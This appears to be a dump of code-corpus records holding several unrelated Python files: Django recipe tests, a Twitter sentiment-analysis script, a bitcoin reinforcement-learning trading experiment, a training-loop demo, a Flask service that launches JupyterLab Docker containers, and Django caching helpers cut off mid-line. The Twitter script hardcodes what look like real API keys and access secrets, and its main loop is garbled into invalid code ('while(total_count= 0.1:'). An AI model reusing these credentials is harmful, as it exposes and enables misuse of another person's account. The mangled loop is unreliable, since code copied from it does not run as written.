bbox_inches='tight')\n\tplt.close()","sub_path":"BTP/CC Lab/WKNN/rssi_vs_distance_graph.py","file_name":"rssi_vs_distance_graph.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"510989694","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.test import TestCase\nfrom cooking.models.Recipe import Recipe\nfrom cooking.tests import util\n\n__author__ = 'sarace'\n\n\nclass RecipeMethodsTests(TestCase):\n\n def test_create_recipe(self):\n \"\"\"\n Test the creation of a recipe\n :return:\n \"\"\"\n util.create_test_recipe()\n new_recipe = Recipe.objects.get(name='Tarte Tatin')\n self.assertTrue(new_recipe.id is not None)\n self.assertTrue(new_recipe.global_time == 55)\n self.assertTrue(new_recipe.preparation_time == 15)\n self.assertTrue(new_recipe.costs == 1)\n self.assertTrue(new_recipe.user_mod == 'user_test')\n self.assertTrue(new_recipe.num_people == 6)\n\n def test_update_recipe(self):\n \"\"\"\n Update a recipe, save it and test if the changes were done.\n :return:\n \"\"\"\n recipe = util.create_test_recipe()\n old_recipe_id = recipe.id\n old_recipe_global_time = recipe.global_time\n recipe.global_time = 60\n recipe.save()\n new_recipe = Recipe.objects.get(name='Tarte Tatin')\n self.assertTrue(old_recipe_id == new_recipe.id)\n self.assertFalse(old_recipe_global_time == new_recipe.global_time)\n\n\n def test_delete_recipe(self):\n with self.assertRaises(ObjectDoesNotExist):\n \"\"\"\n Delete a recipe and check if it is not anymore in the DB\n :return:\n \"\"\"\n recipe = util.create_test_recipe()\n recipe_id = recipe.id\n recipe.delete()\n deleted_recipe = Recipe.objects.get(pk=recipe_id)\n","sub_path":"cooking/tests/RecipeTests.py","file_name":"RecipeTests.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"386609711","text":"import time, csv, sys, io, re\nimport twitter\nfrom textblob import TextBlob\ntry:\n\tpass\nexcept:\n\tprint(\"ERROR MESSAGE:\")\n\tprint(\"You should have twitter-pyton api installed.\")\n\tprint(\"You should have textblob api installed.\")\n\tprint(\"You should have csv api installed.\")\n\tprint(\"You should have io api installed.\")\n\tprint(\"You should have re api installed.\")\n\tprint(\"You should have time api installed.\")\n\ndef clean_tweet(string):\n\t# Turns out that Text blob handles emoticons for sentiment analysis as well.\n\t# So there is no need to replace emoticons.\n\t#cleaning tweets for some well known abbreviations and removing special characters.\n\t#removing hyperlinks as well as Twitter is attaching the Tweet link after the Tweet text.\n\tstring = re.sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', '', string)\n\tstring = re.sub(r'\\bthats\\b', 'that is', string)\n\tstring = re.sub(r'\\bive\\b', 'i have', string)\n\tstring = re.sub(r'\\bim\\b', 'i am', string)\n\tstring = re.sub(r'\\bya\\b', 'yeah', string)\n\tstring = re.sub(r'\\bcant\\b', 'can not', string)\n\tstring = re.sub(r'\\bwont\\b', 'will not', string)\n\tstring = re.sub(r'\\bid\\b', 'i would', string)\n\tstring = re.sub(r'wtf', 'what the fuck', string)\n\tstring = re.sub(r'\\bwth\\b', 'what the hell', string)\n\tstring = re.sub(r'\\br\\b', 'are', string)\n\tstring = re.sub(r'\\bu\\b', 'you', string)\n\tstring = re.sub(r'\\bk\\b', 'OK', string)\n\tstring = re.sub(r'\\bsux\\b', 'sucks', string)\n\tstring = re.sub(r'\\bno+\\b', 'no', string)\n\tstring = re.sub(r'\\bcoo+\\b', 'cool', string)\n\t#no need to remove emoticons\n\t#string = re.sub(r'\\b:\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b:D\\b', 'good', string)\n\t#string = re.sub(r'\\b:\\(\\b', 'sad', string)\n\t#string = re.sub(r'\\b:-\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b=\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b\\(:\\b', 'good', string)\n\t#string = re.sub(r'\\b:\\\\\\b', 'annoyed', string)\n\treturn string\n\n#Python has some serious problems with non ascii characters.\ndef strip_non_ascii(string):\n\t#removing the non ascii characters from the string because Python has a lot of encoding problems\n\t''' Returns the string without non ASCII characters'''\n\tstripped = (c for c in string if 0 < ord(c) < 127)\n\treturn ''.join(stripped)\n\n#TO get the runtime of the program, can be ignored.\nstart_time = time.time()\n#Access keys for the Twitter API\nconsumer_key = 'DGh9KwPCvFwmOGHoBajHaCEIP'\nconsumer_secret = 'h5nGxUW36rKDYyXJF2bJRHafLOmPwOO6hPqWAraDNMh3j0DUWc'\naccess_token = '963536281165803520-NQzBRAIa13bjmIYd2cEmgDKqgvFY3JP'\naccess_secret = 'lp2Hu3FOdJ5Z563Isb7VCUtTk2UwH03LLummrYskunnd3'\n\n#40.7127° N, -74.0134° W One World Trade Center\n#37.8199° N, -122.4783° W Golden Gate Bridge\n#Getting the Latitude and Longitude from Google Places API\noutfile = \"tweets.csv\"\nlatitude = 37.8199\nlongitude = -122.4783\nkm_range = 1000\nnum_results = 100\n\n#auth = OAuthHandler(consumer_key, consumer_secret)\n#auth.set_access_token(access_token, access_secret)\n\n#twitter = Twitter(\n#\tauth = OAuth(access_token, access_secret, consumer_key, consumer_secret)) \n#Authentication for the Twitter API\ntry:\n\tapi = twitter.Api(consumer_key, consumer_secret, access_token, access_secret)\nexcept:\n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"Authentication Failed. Do something!!!!\")\n\n#INdexing and opening the CSV file to store the tweets in\n#Stream API can also work.\ntry:\n\tindexer = [\"User\", \"Tweet\", \"Latitude\", \"Longitude\", \"Sentiment\", \"ID\"]\n\tcsvfile = open(outfile,\"w\")\n\tcsvwriter = csv.writer(csvfile)\n\tcsvwriter.writerow(indexer)\nexcept:\n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"cannot open the csv file to save the tweets.\")\n\n#Main Program starts here,\n#api = tweepy.API(auth)\n#for status in tweepy.Cursor(api.home_timeline).items(100):\n # with io.open(\"lol.txt\", \"w+\", encoding = 'utf-8') as f:\n # \tf.write(status.text)\n#f.close()\ntry:\n\tglobal last_id\n\tresult_count= 0\n\tlast_id = None\n\tquery = api.GetSearch(geocode = (latitude, longitude, \"100mi\"), count=512, max_id = last_id)\n\tprint(len(query))\nexcept: \n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"Not able to query the twitter API. \")\n\tprint(\"Check Connection.\")\n#total count is the number of tweets we have\n#needed_tweets is the number of tweets we need\n#we call the api until we get the amount of tweets that we need.\ntotal_count = 1\nneeded_tweets = 1000\nwhile(total_count= 0.1:\n\t\t\tpolarity = 'positive'\n\t\telif setup <= -0.1:\n\t\t\tpolarity = 'negative'\n\t\telse:\n\t\t\tpolarity = 'neutral'\n\t\t#print(polarity)\n\t\t#last_id gets the last ID of the tweet that was found in the last iteration\n\t\tif(not(last_id)):\n\t\t\tlast_id = result.id\n\t\telse:\n\t\t\tlast_id = min(result.id, last_id)\n\t\t#we use last ID so that we do not get past tweets again and again\n\t\tID = result.id\n\t\t#print(str(last_id) +\"\t + str(ID))\n\t\trow = [user, ans, latitude, longitude, polarity, ID]\n\t\tcsvwriter.writerow(row)\n\t\t#Still getting same tweets again and again.\n\t\t#Twitter API is not giving access to old tweets I suppose. Maybe the result of a Standard Licence API?\n\t\t#print(result.full_text)\n\t\t#if(result[\"geo\"]):\n\t\t#\tuser = result[\"user\"][\"screen_name\"]\n\t\t#\ttext = result[\"text\"]\n\t\t#\tt=text\n\t\t#\ttext = str(t)\n\t\t#\tlatituded = result[\"geo\"][\"coordinates\"][0]\n\t\t#\tlongituded = result[\"geo\"][\"coordinates\"][1\n\t\t#\t#-----------------------------------------------------------------------\n\t\t#\t# now write this row to our CSV file\n\t\t\t#-----------------------------------------------------------------------\n\t\t#\trow = [ user, text, latituded, longituded[] ]\n\t\t#\tcsvwriter.writerow(row)\n\t\t#\tresult_count += 1\n\t\t#\tlast_id = result[\"id\"]\n\t\t#print(\"%d tweets received as of now\"%(count))\n\t#total_count+=count\n\t#print(\"%d is the total amount of tweets received.\"%(total_count))\ncsvfile.close()\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n\n#[6918 rows x 3 columns]\n#Accuracy 0.837236195432\n#Precision 0.894869638352","sub_path":"other/Tweet_Sentiment.py","file_name":"Tweet_Sentiment.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"134819001","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\nimport sys\n\nsys.path.insert(0, \"../../../Data/src/ReadData\")\nimport RRL as RRL\nimport regDataSets as data\nimport dataProcessing as proc\n\n\n# parameters\ndataPath = \"../../../Data/\"\nfileName = dataPath + \"bcEUR.csv.gz\"\n\nstartTimes = [9.46771200e+08, 1.4005e9]\nendTimes = [1.4e9, 1.431e9]\n\nsmoothWindow = 30\ntimeScale = 3\n\nNtrain = 1\nNderivs = 2 \t\t\t# consider past point in decision\ntimePerBin = 500 \t# number of seconds per bin\ntrainSteps = 500\nNtimeBins_train = 20\nNtimeBins_test = 20\nlearningRate = .7\nLRdecay = 0.8\nreg = 0.0\n\nfee = 0.0025\n\n\n####\tImport Data ####\ndataSets = data.importData(fileName, startTimes, endTimes)\n\n# Rebin the data\nprint(len(dataSets))\ntime_train, price_train = proc.binner(dataSets[0], timePerBin, NtimeBins_train)\ntime_test, price_test = proc.binner(dataSets[1], timePerBin, NtimeBins_test)\n\n# Final price array to be used\nX_train = proc.smoother(time_train, price_train, smoothWindow, timeScale)\nX_test = proc.smoother(time_test, price_test, smoothWindow, timeScale)\n\n# Indicator (+-1) of the price from n-1 to n at index n\nY_train = data.getYvalues(X_train)\nY_test = data.getYvalues(X_test)\n\n# BTC price change rate between NN bins\nbtcRate_train = np.zeros(NtimeBins_train - 1 - Nderivs)\nbtcRate_test = np.zeros(NtimeBins_test - 1 - Nderivs)\n \nfor itm in range(Nderivs+1, NtimeBins_test):\n btcRate_test[itm-1-Nderivs] = X_test[itm]/X_test[itm-1] - 1.0\n\nfor itm in range(Nderivs+1, NtimeBins_train):\n btcRate_train[itm-1-Nderivs] = X_train[itm]/X_train[itm-1] - 1.0\n\n\n#### Make Features ####\n\n# Calculate derivatives\nderivs_train = RRL.derivatives(X_train, Nderivs)\nderivs_test = RRL.derivatives(X_test, Nderivs)\n\nfeatures_train = derivs_train\nfeatures_test = derivs_test\n\n#### Resize ####\ntime_train = time_train[Nderivs+1:-1]\nprice_train = price_train[Nderivs+1:-1]\ntime_test = time_test[Nderivs+1:-1]\nprice_test = price_test[Nderivs+1:-1]\n\nX_train = X_train[Nderivs+1:-1]\nX_test = X_test[Nderivs+1:-1]\nY_train = Y_train[Nderivs+1:-1]\nY_test = Y_test[Nderivs+1:-1]\n\nfeatures_train = features_train[:-1]\nfeatures_test = features_test[:-1]\n\n\n###########################\n#### Train The Model ####\n###########################\n\ntheta = np.zeros(np.size(features_train,1))\nwealth_train = np.zeros(np.size(features_train,0))\n\n#### Training ####\nfor itm in range(1, Ntrain+1):\n theta = RRL.RRLearning(features_train, theta, learningRate, btcRate_train, fee)\n learningRate = learningRate*LRdecay\n\n#### Calculate Profit ####\ncorrectRate = 0;\nbuyThresh = 0\nsellThresh = 0\nprofit_train = np.zeros(np.size(features_train, 0))\nprofit_train[0] = 1.\nFarr_train = np.zeros(np.size(features_train, 0))\nfor itm in range(0,np.size(features_train, 0)):\n Farr_train[itm] = (1.0 + np.tanh(np.dot(theta, features_train[itm,:])))/2.0\n\nfor itm in range(1, np.size(features_train, 0)):\n correctRate += (np.sign(Y_train[itm]*(Farr_train[itm] - 0.5)) + 1.0)/2.0\n profit_train[itm] = profit_train[itm-1]*(1.0 + Farr_train[itm]*btcRate_train[itm])*(1.0 - fee*np.abs(Farr_train[itm] - Farr_train[itm-1]))\n\nprint(\"!!!!! TRAINING RESULTS !!!!!\")\nprint(\" log profit of \" + str(profit_train[np.size(features_train, 0)-1]))\n\ncorrectRate = (correctRate/np.size(features_train, 0))\nprint(\" correct rate: \" + str(correctRate))\n\n\n##########################\n#### Test The Model ####\n##########################\n\ncorrectRate = 0\nprofit_test = np.zeros(np.size(features_test, 0))\nprofit_test[0] = 1.0\n\nFarr_test = np.zeros(np.size(features_test,0))\nfor itm in range(0,np.size(features_test,0)):\n Farr_test[itm] = (1.0 + np.tanh(np.dot(theta, features_test[itm,:])))/2.0\n\nfor itm in range(1, np.size(features_test,0)):\n correctRate += (np.sign(Y_test[itm]*(Farr_test[itm] - 0.5)) + 1.0)/2.0\n profit_test[itm] = profit_test[itm-1]*(1.0 + Farr_test[itm]*btcRate_test[itm])*(1.0 - fee*np.abs(Farr_test[itm] - Farr_test[itm-1]))\n\ncorrectRate = (correctRate/np.size(features_test, 0))\n\nprint(\"!!!!! TESTING RESULTS !!!!!\")\nprint(\" log test profit of \" + str(profit_test[np.size(features_test, 0) - 1]))\nprint(\" correct rate: \" + str(correctRate))\n\nprint(\"\\n\\nFinal test/train cumulative weighted confidence\\n\"\n +\"\\t\"+str(profit_test[-1])+\" / \"+str(profit_train[-2])+\" \"\n +str(np.log10(profit_test[-1]))+\" / \"+str(np.log10(profit_train[-2])));\n\n\n########################\n#### Plot Results ####\n########################\n\nfig, ax = plt.subplots(figsize=(7,5))\n\ntime_train /= 86400\ntime_test /= 86400\n\nprint(time_train.shape, profit_train.shape)\ntplt1, = ax.plot(time_train, profit_train, 'b', label='Train', linewidth=2.5)\ntplt2, = ax.plot(time_test, profit_test, 'k', label='Test', linewidth=2.5)\nax.set_xlabel('Time [days]', fontweight='bold')\nax.set_ylabel('Cumulative Weighted Confidence', fontweight='bold')\nax.semilogy()\n\nlgnd = ax.legend(handles=[tplt1, tplt2], title='Recurrent RL', loc='lower right', fancybox=True)\nplt.setp(lgnd.get_title(), fontsize='large', fontweight='bold')\nax.grid()\nplt.show()\nfig.savefig(\"rrlTestvTrain.png\", format='png')\n\n","sub_path":"Learning/src/RRL/run_RRL.py","file_name":"run_RRL.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"507069013","text":"from utils.logger import TermLogger,AverageMeter\nfrom validation import val\nfrom train import train\nimport time\ndef main():\n '''\n TermLogger demo\n 训练框架\n :return:\n '''\n epochs = 15\n train_size=10#batchs for train\n valid_size = 6\n\n logger = TermLogger(n_epochs=epochs,\n train_size=train_size,\n valid_size=valid_size)\n logger.reset_epoch_bar()\n\n\n #first val\n first_val = True\n val_losses = AverageMeter(precision=3)\n if first_val:\n val_names,val_losses = val(logger)\n else:\n val_loss = 0\n\n logger.reset_epoch_bar()\n #logger.epoch_logger_update(epoch=0,display)\n\n logger.epoch_bar.update(epoch=0)\n logger.epoch_writer.write('---\\n---\\n---')\n epoch_time = AverageMeter()\n\n\n\n end = time.time()\n for epoch in range(1,epochs):\n\n train_names,train_losses=train(logger)\n\n val_names,val_losses=val(logger)\n\n epoch_time.update(time.time()-end)\n end = time.time()\n\n\n logger.reset_train_bar()\n logger.reset_valid_bar()\n\n #if log_terminal\n logger.epoch_logger_update(epoch=epoch,time=epoch_time,names=val_names,values=val_losses)\n\n logger.epoch_bar.finish()\n print('over')\nif __name__ =='__main__':\n main()","sub_path":"tutorials/train_val_framework/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"120555068","text":"'''\nCreated on 12 Feb, 2020\n\n@author: Tim Kreuzer\n'''\n\nimport subprocess\n\nfrom flask import request\nfrom flask_restful import Resource\nfrom flask import current_app as app\n\nfrom app import utils_common, utils_file_loads, jlab_utils\nimport os\nfrom pathlib import Path\n\nclass JupyterLabHandler(Resource):\n def get(self):\n try:\n \"\"\"\n Headers:\n Intern-Authorization: spawner_token\n uuidcode\n Containername: uuidcode_from_spawn \n \"\"\"\n # Track actions through different webservices.\n uuidcode = request.headers.get('uuidcode', '')\n app.log.info(\"uuidcode={} - Get JupyterLab Status\".format(uuidcode))\n app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n \n # Check for the J4J intern token\n utils_common.validate_auth(app.log,\n uuidcode,\n request.headers.get('intern-authorization', None))\n \n request_headers = {}\n for key, value in request.headers.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_headers[key.lower()] = value\n containername = request_headers.get(\"containername\")\n cmd1 = [\"docker\", \"ps\", \"-q\", \"-f\", \"name={}\".format(containername)]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd1))\n ret = subprocess.check_output(cmd1, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not check docker status. Return True\".format(uuidcode))\n return \"True\", 200\n if ret == \"\":\n return \"False\", 200\n else:\n cmd2 = [\"docker\", \"ps\", \"-aq\", \"-f\", \"status=exited\", \"-f\", \"name={}\".format(containername)]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd2))\n ret = subprocess.check_output(cmd2, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not check docker status. Return True\".format(uuidcode))\n return \"True\", 200\n if ret == \"\":\n # it's running\n return \"True\", 200\n else:\n # cleanup. Container status=exited\n cmd3 = [\"docker\", \"rm\", containername]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd3))\n ret = subprocess.check_output(cmd3, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not cleanup non running container. Return False\".format(uuidcode))\n return \"False\", 200\n return \"False\", 200\n except:\n app.log.exception(\"JLab.get failed. Bugfix required\")\n return '', 500\n\n def post(self):\n try:\n \"\"\"\n Headers:\n Intern-Authorization: spawner_token\n uuidcode\n accesstoken\n expire\n Body:\n email\n environments\n image\n port\n servername\n jupyterhub_api_url\n Config:\n basefolder # /etc/j4j/j4j_hdfcloud\n network\n cap-add\n memory\n memory-swap\n device\n storage-opt \n \"\"\"\n # Track actions through different webservices.\n uuidcode = request.headers.get('uuidcode', '')\n app.log.info(\"uuidcode={} - Start JupyterLab\".format(uuidcode))\n app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n app.log.trace(\"uuidcode={} - Json: {}\".format(uuidcode, request.json))\n \n # Check for the J4J intern token\n utils_common.validate_auth(app.log,\n uuidcode,\n request.headers.get('intern-authorization', None))\n \n request_headers = {}\n for key, value in request.headers.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_headers[key.lower()] = value\n request_json = {}\n for key, value in request.json.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_json[key.lower()] = value\n app.log.trace(\"uuidcode={} - New Headers: {}\".format(uuidcode, request_headers))\n app.log.trace(\"uuidcode={} - New Json: {}\".format(uuidcode, request_json))\n \n if \"SERVICELEVEL\" in request_json.get(\"envrionments\", {}).keys():\n config = utils_file_loads.get_servicelevel_config(request_json.get(\"environments\", {}).get(\"SERVICELEVEL\", \"default\"))\n else:\n config = utils_file_loads.get_general_config()\n basefolder = config.get('basefolder', '')\n userfolder = os.path.join(basefolder, request_json.get('email').replace(\"@\", \"_at_\"))\n serverfolder = Path(os.path.join(userfolder, '.{}'.format(uuidcode)))\n mounts = jlab_utils.get_mounts(app.log, uuidcode, serverfolder, userfolder)\n \n cmd = [\"timeout\", \"{}\".format(config.get('timeout', '30d')), \"docker\", \"run\"]\n cmd.append(\"--network\")\n cmd.append(config.get(\"network\"))\n cmd.append(\"--cap-add\")\n cmd.append(config.get(\"cap-add\"))\n cmd.append(\"--memory\")\n cmd.append(config.get(\"memory\"))\n cmd.append(\"--memory-swap\")\n cmd.append(config.get(\"memory-swap\"))\n cmd.append(\"--device\")\n cmd.append(config.get(\"device\"))\n cmd.append(\"--storage-opt\")\n cmd.append(config.get(\"storage-opt\"))\n cmd.append(\"--name\")\n cmd.append(uuidcode)\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"HPCACCOUNTS\", request_json.get(\"environments\",{}).get(\"HPCACCOUNTS\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_API_URL\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_API_URL\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_CLIENT_ID\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_CLIENT_ID\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_API_TOKEN\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_API_TOKEN\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_USER\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_USER\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_SERVICE_PREFIX\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_SERVICE_PREFIX\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_BASE_URL\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_BASE_URL\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"UNITYJSCACCESSTOKEN\", request.headers.get(\"accesstoken\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"UNITYJSCACCESSTOKENEXPIRATION\", request.headers.get(\"expire\", \"\")))\n cmd.extend(mounts)\n cmd.append(request_json.get(\"image\"))\n cmd.append(\"/home/jovyan/.start.sh\")\n cmd.append(str(request_json.get(\"port\")))\n cmd.append(request_json.get(\"servername\"))\n cmd.append(request_json.get(\"jupyterhub_api_url\"))\n #if request_json.get(\"service\", \"\").lower() == \"dashboard\":\n # cmd.append(request_json.get())\n cmd.append(\"&\")\n app.log.debug(\"uuidcode={} - Run Command: {}\".format(uuidcode, cmd))\n subprocess.Popen(cmd)\n except:\n app.log.exception(\"JLab.post failed. Bugfix required\")\n return \"\", 500\n return \"\", 202\n\n def delete(self):\n \"\"\"\n Headers:\n Intern-Authorization: spawner_token\n uuidcode\n containername: uuidcode from spawn\n \"\"\"\n try:\n # Track actions through different webservices.\n uuidcode = request.headers.get('uuidcode', '')\n app.log.info(\"uuidcode={} - Delete JupyterLab\".format(uuidcode))\n app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n \n # Check for the J4J intern token\n utils_common.validate_auth(app.log,\n uuidcode,\n request.headers.get('intern-authorization', None))\n request_headers = {}\n for key, value in request.headers.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_headers[key.lower()] = value \n containername = request_headers.get('containername')\n cmd1 = [\"docker\", \"container\", \"exec\", containername, \"/bin/umount\", \"/home/jovyan/B2DROP\"]\n cmd2 = [\"docker\", \"container\", \"exec\", containername, \"/bin/fusermount\", \"-u\", \"/home/jovyan/HPCMOUNT\"]\n cmd3 = [\"docker\", \"container\", \"rm\", \"--force\", containername]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd1))\n ret = subprocess.check_output(cmd1, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.warning(\"uuidcode={} - Could not unmount B2DROP\".format(uuidcode))\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd2))\n ret = subprocess.check_output(cmd2, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.warning(\"uuidcode={} - Could not unmount HPCMOUNT\".format(uuidcode))\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd3))\n ret = subprocess.check_output(cmd3, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not stop container\".format(uuidcode))\n \n except:\n app.log.exception(\"JLabs.delete failed. Bugfix required\")\n return '', 500\n return '', 202\n","sub_path":"app/jlab.py","file_name":"jlab.py","file_ext":"py","file_size_in_byte":11688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"350185766","text":"import datetime\nfrom django.conf import settings\nfrom django.utils import timezone\nimport os\n\nfrom eulfedora.views import datastream_etag\nfrom eulfedora.server import Repository\nfrom eulfedora.util import RequestFailed\n\nfrom readux.annotations.models import Annotation\nfrom readux.books.models import Volume, VolumeV1_0, Page, PageV1_0\nfrom readux.utils import solr_interface, md5sum\n\n'''\nConditional methods for calculating last modified time and ETags\nfor view methods in :mod:`readux.books.views`.\n\n.. Note::\n\n In many cases, the Solr indexing timestamp is used rather than the object\n modification time, as this may account for changes to the site or indexing\n (including adding pages to a volume that is otherwise unchanged).\n'''\n\n\ndef volumes_modified(request, *args, **kwargs):\n 'last modification time for all volumes'\n solr = solr_interface()\n results = solr.query(content_model=VolumeV1_0.VOLUME_CONTENT_MODEL) \\\n .sort_by('-timestamp').field_limit('timestamp')\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has changed it may have been modified\n\n # if user is logged in, changes in annotation totals result\n # in volume page display modifications\n latest_note = None\n if request.user.is_authenticated():\n latest_note = Annotation.objects.visible_to(request.user) \\\n .last_created_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef volume_modified(request, pid):\n 'last modification time for a single volume'\n solr = solr_interface()\n results = solr.query(content_model=VolumeV1_0.VOLUME_CONTENT_MODEL,\n pid=pid) \\\n .sort_by('-timestamp').field_limit('timestamp')\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has changed it may have been modified,\n # and index timestamp for a volume will be updated when pages are added\n\n # if a user is logged in, page should show as modified\n # when annotation count changes\n latest_note = None\n if request.user.is_authenticated():\n # NOTE: shouldn't be very expensive to init volume here; not actually\n # making any api calls, just using volume to get volume\n # uri and associated annotations\n repo = Repository()\n vol = repo.get_object(pid, type=Volume)\n # newest annotation creation for pages in this volume\n latest_note = vol.annotations().visible_to(request.user) \\\n .last_created_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef volume_pages_modified(request, pid):\n '''Last modification time for a single volume or its pages, or for\n any annotations of those pages.'''\n solr = solr_interface()\n repo = Repository()\n vol = repo.get_object(pid, type=Volume)\n\n # NOTE: some overlap with Volume find_solr_pages method...\n results = solr.query((solr.Q(content_model=Volume.VOLUME_CMODEL_PATTERN) & solr.Q(pid=pid)) | \\\n (solr.Q(content_model=Page.PAGE_CMODEL_PATTERN) & solr.Q(isConstituentOf=vol.uri))) \\\n .sort_by('-timestamp').field_limit('timestamp')\n\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has changed it may have been modified,\n # and index timestamp for a volume will be updated when pages are added\n\n # Page could also be modified based on annotations of the pages.\n # We only show total counts per page, so might not be modified if the\n # total number has not changed, but simplest just to get last modification\n # date in case of changes.\n # Note that this does NOT account for annotation deletions.\n\n # if a user is logged in, page should show as modified\n # based on annotations\n # Only displaying annotation *count* so creation time should\n # be sufficient. (Does not take into account deletions...)\n latest_note = None\n if request.user.is_authenticated():\n # get annotations for pages in this volume\n try:\n latest_note = vol.annotations().visible_to(request.user) \\\n .last_created_time()\n except Annotation.DoesNotExist:\n # no notes for this volume\n pass\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef page_modified(request, vol_pid, pid):\n 'last modification time for a single page'\n solr = solr_interface()\n # TODO: use volume pid in query\n results = solr.query(content_model=PageV1_0.PAGE_CONTENT_MODEL,\n pid=pid) \\\n .sort_by('-timestamp').field_limit('timestamp')\n\n # if user is logged in, page should show as modified\n # when annotations have changed\n latest_note = None\n if request.user.is_authenticated():\n # last update for annotations on this volume, if any\n repo = Repository()\n page = repo.get_object(pid, type=Page)\n latest_note = page.annotations().visible_to(request.user) \\\n .last_updated_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef solrtimestamp_or_datetime(solrtime, othertime):\n # Compare and return the more recent of a solr timestamp or an\n # annotation datetime.\n\n # convert solr timestamp to timezone-aware for comparison;\n # return the most recent of the two\n # FIXME: assuming solr stores as UTC, confirm this\n if solrtime is not None and othertime is not None:\n solrtime = timezone.make_aware(solrtime, timezone.utc)\n return max(solrtime, othertime)\n\n # if both are not set, return solr time if present\n if solrtime is not None:\n return solrtime\n\n # if nothing has been returned, return other time (could be None)\n return othertime\n\n\nbooks_models_filename = os.path.join(settings.BASE_DIR, 'readux', 'books', 'models.py')\nbooks_models_modified = 